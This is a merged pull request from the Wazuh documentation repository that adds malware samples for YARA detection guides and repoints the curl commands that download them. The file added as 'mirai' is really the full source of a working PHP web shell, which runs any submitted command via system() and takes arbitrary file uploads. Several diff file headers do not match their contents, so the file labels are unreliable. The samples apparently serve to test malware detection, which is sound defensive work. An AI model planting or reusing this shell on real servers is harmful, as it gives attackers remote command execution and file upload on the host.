Merge pull request #8961 from wazuh/change/idr371-host-malware-samples

Host malware samples in documentation repository

Author: ayodeko

CHANGELOG.md

@@ -15,6 +15,7 @@ All notable changes to this project will be documented in this file.
 - **Post-release**: Updated the *Navigating the Wazuh dashboard* section. ([#8950](https://github.com/wazuh/wazuh-documentation/pull/8950))
 - **Post-release**: Updated the System inventory documentation. ([#8955](https://github.com/wazuh/wazuh-documentation/pull/8955))
 - **Post-release**: Updated the *Getting started* guide. ([#8962](https://github.com/wazuh/wazuh-documentation/pull/8962)) ([#8963](https://github.com/wazuh/wazuh-documentation/pull/8963)) ([#8964](https://github.com/wazuh/wazuh-documentation/pull/8964)) ([#8965](https://github.com/wazuh/wazuh-documentation/pull/8965))
+- **Post-release**: Updated the URLs of malware samples. ([#8961](https://github.com/wazuh/wazuh-documentation/pull/8961))
 
 ### Fixed
 

resources/samples/mirai

@@ -0,0 +1,70 @@
+<?php
+
+set_magic_quotes_runtime(0);
+
+print "<style>body{font-family:trebuchet ms;font-size:16px;}hr{width:100%;height:2px;}</style>";
+print "<center><h1>#worst @dal.net</h1></center>";
+print "<center><h1>You have been hack By Shany with Love To #worst.</h1></center>";
+print "<center><h1>Watch Your system Shany was here.</h1></center>";
+print "<center><h1>Linux Shells</h1></center>";
+print "<hr><hr>";
+
+$currentWD  = str_replace("\\\\","\\",$_POST['_cwd']);
+$currentCMD = str_replace("\\\\","\\",$_POST['_cmd']);
+
+$UName  = `uname -a`;
+$SCWD   = `pwd`;
+$UserID = `id`;
+
+if( $currentWD == "" ) {
+    $currentWD = $SCWD;
+}
+
+print "<table>";
+print "<tr><td><b>We are:</b></td><td>".$_SERVER['REMOTE_HOST']." (".$_SERVER['REMOTE_ADDR'].")</td></tr>";
+print "<tr><td><b>Server is:</b></td><td>".$_SERVER['SERVER_SIGNATURE']."</td></tr>";
+print "<tr><td><b>System type:</b></td><td>$UName</td></tr>";
+print "<tr><td><b>Our permissions:</b></td><td>$UserID</td></tr>";
+print "</table>";
+
+print "<hr><hr>";
+
+if( $_POST['_act'] == "List files!" ) {
+    $currentCMD = "ls -la";
+}
+
+print "<form method=post enctype=\"multipart/form-data\"><table>";
+
+print "<tr><td><b>Execute command:</b></td><td><input size=100 name=\"_cmd\" value=\"".$currentCMD."\"></td>";
+print "<td><input type=submit name=_act value=\"Execute!\"></td></tr>";
+
+print "<tr><td><b>Change directory:</b></td><td><input size=100 name=\"_cwd\" value=\"".$currentWD."\"></td>";
+print "<td><input type=submit name=_act value=\"List files!\"></td></tr>";
+
+print "<tr><td><b>Upload file:</b></td><td><input size=85 type=file name=_upl></td>";
+print "<td><input type=submit name=_act value=\"Upload!\"></td></tr>";
+
+print "</table></form><hr><hr>";
+
+$currentCMD = str_replace("\\\"","\"",$currentCMD);
+$currentCMD = str_replace("\\\'","\'",$currentCMD);
+
+if( $_POST['_act'] == "Upload!" ) {
+    if( $_FILES['_upl']['error'] != UPLOAD_ERR_OK ) {
+        print "<center><b>Error while uploading file!</b></center>";
+    } else {
+        print "<center><pre>";
+        system("mv ".$_FILES['_upl']['tmp_name']." ".$currentWD."/".$_FILES['_upl']['name']." 2>&1");
+        print "</pre><b>File uploaded successfully!</b></center>";
+    }    
+} else {
+    print "\n\n<!-- OUTPUT STARTS HERE -->\n<pre>\n";
+    $currentCMD = "cd ".$currentWD.";".$currentCMD;
+    system($currentCMD);
+    print "\n</pre>\n<!-- OUTPUT ENDS HERE -->\n\n</center><hr><hr><center><b>Command completed</b></center>";
+}
+
+exit;
+
+?>
+

resources/samples/vpn_filter

@@ -283,25 +283,25 @@ Attack emulation
           # Mirai
           echo "# Mirai: https://en.wikipedia.org/wiki/Mirai_(malware)"
           echo "Downloading malware sample..."
-          fetch_sample "https://wazuh-demo.s3-us-west-1.amazonaws.com/mirai" "/tmp/yara/malware/mirai" && echo "Done!" || echo "Error while downloading."
+          fetch_sample "https://raw.githubusercontent.com/wazuh/wazuh-documentation/refs/heads/|WAZUH_CURRENT_MINOR|/resources/samples/mirai" "/tmp/yara/malware/mirai" && echo "Done!" || echo "Error while downloading."
           echo
 
           # Xbash
           echo "# Xbash: https://unit42.paloaltonetworks.com/unit42-xbash-combines-botnet-ransomware-coinmining-worm-targets-linux-windows/"
           echo "Downloading malware sample..."
-          fetch_sample "https://wazuh-demo.s3-us-west-1.amazonaws.com/xbash" "/tmp/yara/malware/xbash" && echo "Done!" || echo "Error while downloading."
+          fetch_sample "https://raw.githubusercontent.com/wazuh/wazuh-documentation/refs/heads/|WAZUH_CURRENT_MINOR|/resources/samples/xbash" "/tmp/yara/malware/xbash" && echo "Done!" || echo "Error while downloading."
           echo
 
           # VPNFilter
           echo "# VPNFilter: https://news.sophos.com/en-us/2018/05/24/vpnfilter-botnet-a-sophoslabs-analysis/"
           echo "Downloading malware sample..."
-          fetch_sample "https://wazuh-demo.s3-us-west-1.amazonaws.com/vpn_filter" "/tmp/yara/malware/vpn_filter" && echo "Done!" || echo "Error while downloading."
+          fetch_sample "https://raw.githubusercontent.com/wazuh/wazuh-documentation/refs/heads/|WAZUH_CURRENT_MINOR|/resources/samples/vpn_filter" "/tmp/yara/malware/vpn_filter" && echo "Done!" || echo "Error while downloading."
           echo
 
           # Webshell
           echo "# WebShell: https://github.com/SecWiki/WebShell-2/blob/master/Php/Worse%20Linux%20Shell.php"
           echo "Downloading malware sample..."
-          fetch_sample "https://wazuh-demo.s3-us-west-1.amazonaws.com/webshell" "/tmp/yara/malware/webshell" && echo "Done!" || echo "Error while downloading."
+          fetch_sample "https://raw.githubusercontent.com/wazuh/wazuh-documentation/refs/heads/|WAZUH_CURRENT_MINOR|/resources/samples/webshell" "/tmp/yara/malware/webshell" && echo "Done!" || echo "Error while downloading."
           echo
       fi
 

resources/samples/webshell

@@ -633,9 +633,9 @@ Run the following commands on the Ubuntu endpoint to download malware samples to
 
 .. code-block:: console
 
-   # curl "https://wazuh-demo.s3-us-west-1.amazonaws.com/mirai" > /home/mirai
-   # curl "https://wazuh-demo.s3-us-west-1.amazonaws.com/xbash" > /home/xbash
-   # curl "https://wazuh-demo.s3-us-west-1.amazonaws.com/webshell" > /home/webshell
+   # curl "https://raw.githubusercontent.com/wazuh/wazuh-documentation/refs/heads/|WAZUH_CURRENT_MINOR|/resources/samples/mirai" > /home/mirai
+   # curl "https://raw.githubusercontent.com/wazuh/wazuh-documentation/refs/heads/|WAZUH_CURRENT_MINOR|/resources/samples/xbash" > /home/xbash
+   # curl "https://raw.githubusercontent.com/wazuh/wazuh-documentation/refs/heads/|WAZUH_CURRENT_MINOR|/resources/samples/webshell" > /home/webshell
 
 You can visualize the alert data in the Wazuh dashboard. To do this, go to the **Modules** > **Security events** tab and add the ``rule.groups:yara`` filter in the search bar to query the alerts.
 
@@ -668,9 +668,9 @@ Run the following commands via PowerShell to download malware samples to the mon
 
 .. code-block:: powershell
 
-   > curl "https://wazuh-demo.s3-us-west-1.amazonaws.com/mirai" -o   $env:USERPROFILE\Downloads\mirai
-   > curl "https://wazuh-demo.s3-us-west-1.amazonaws.com/xbash" -o   $env:USERPROFILE\Downloads\xbash
-   > curl "https://wazuh-demo.s3-us-west-1.amazonaws.com/webshell" -o $env:USERPROFILE\Downloads\webshell
+   > curl "https://raw.githubusercontent.com/wazuh/wazuh-documentation/refs/heads/|WAZUH_CURRENT_MINOR|/resources/samples/mirai" -o   $env:USERPROFILE\Downloads\mirai
+   > curl "https://raw.githubusercontent.com/wazuh/wazuh-documentation/refs/heads/|WAZUH_CURRENT_MINOR|/resources/samples/xbash" -o   $env:USERPROFILE\Downloads\xbash
+   > curl "https://raw.githubusercontent.com/wazuh/wazuh-documentation/refs/heads/|WAZUH_CURRENT_MINOR|/resources/samples/webshell" -o $env:USERPROFILE\Downloads\webshell
 
 You can visualize the alert data in the Wazuh dashboard. To do this, go to the **Security events** module and add the filter in the search bar to query the alerts.
 

resources/samples/xbash

@@ -118,8 +118,8 @@ To test that everything works correctly, download the *Mirai* and *Xbash* malwar
 
    .. code-block:: console
 
-      $ sudo curl https://wazuh-demo.s3-us-west-1.amazonaws.com/mirai --output <PATH_TO_MONITORED_DIRECTORY>/mirai
-      $ sudo curl https://wazuh-demo.s3-us-west-1.amazonaws.com/xbash --output <PATH_TO_MONITORED_DIRECTORY>/Xbash
+      $ sudo curl https://raw.githubusercontent.com/wazuh/wazuh-documentation/refs/heads/|WAZUH_CURRENT_MINOR|/resources/samples/mirai --output <PATH_TO_MONITORED_DIRECTORY>/mirai
+      $ sudo curl https://raw.githubusercontent.com/wazuh/wazuh-documentation/refs/heads/|WAZUH_CURRENT_MINOR|/resources/samples/xbash --output <PATH_TO_MONITORED_DIRECTORY>/Xbash
 
 Visualize the alerts
 ^^^^^^^^^^^^^^^^^^^^

source/proof-of-concept-guide/detect-malware-yara-integration.rst

@@ -319,8 +319,8 @@ To test that everything is working correctly, we use the *Mirai* and *Xbash* mal
 
    .. code-block:: console
 
-      $ curl https://wazuh-demo.s3-us-west-1.amazonaws.com/mirai --output ~/mirai
-      $ curl https://wazuh-demo.s3-us-west-1.amazonaws.com/xbash --output ~/Xbash
+      $ curl https://raw.githubusercontent.com/wazuh/wazuh-documentation/refs/heads/|WAZUH_CURRENT_MINOR|/resources/samples/mirai --output ~/mirai
+      $ curl https://raw.githubusercontent.com/wazuh/wazuh-documentation/refs/heads/|WAZUH_CURRENT_MINOR|/resources/samples/xbash --output ~/Xbash
       $ sudo mv ~/mirai /root/
       $ sudo mv ~/Xbash /root/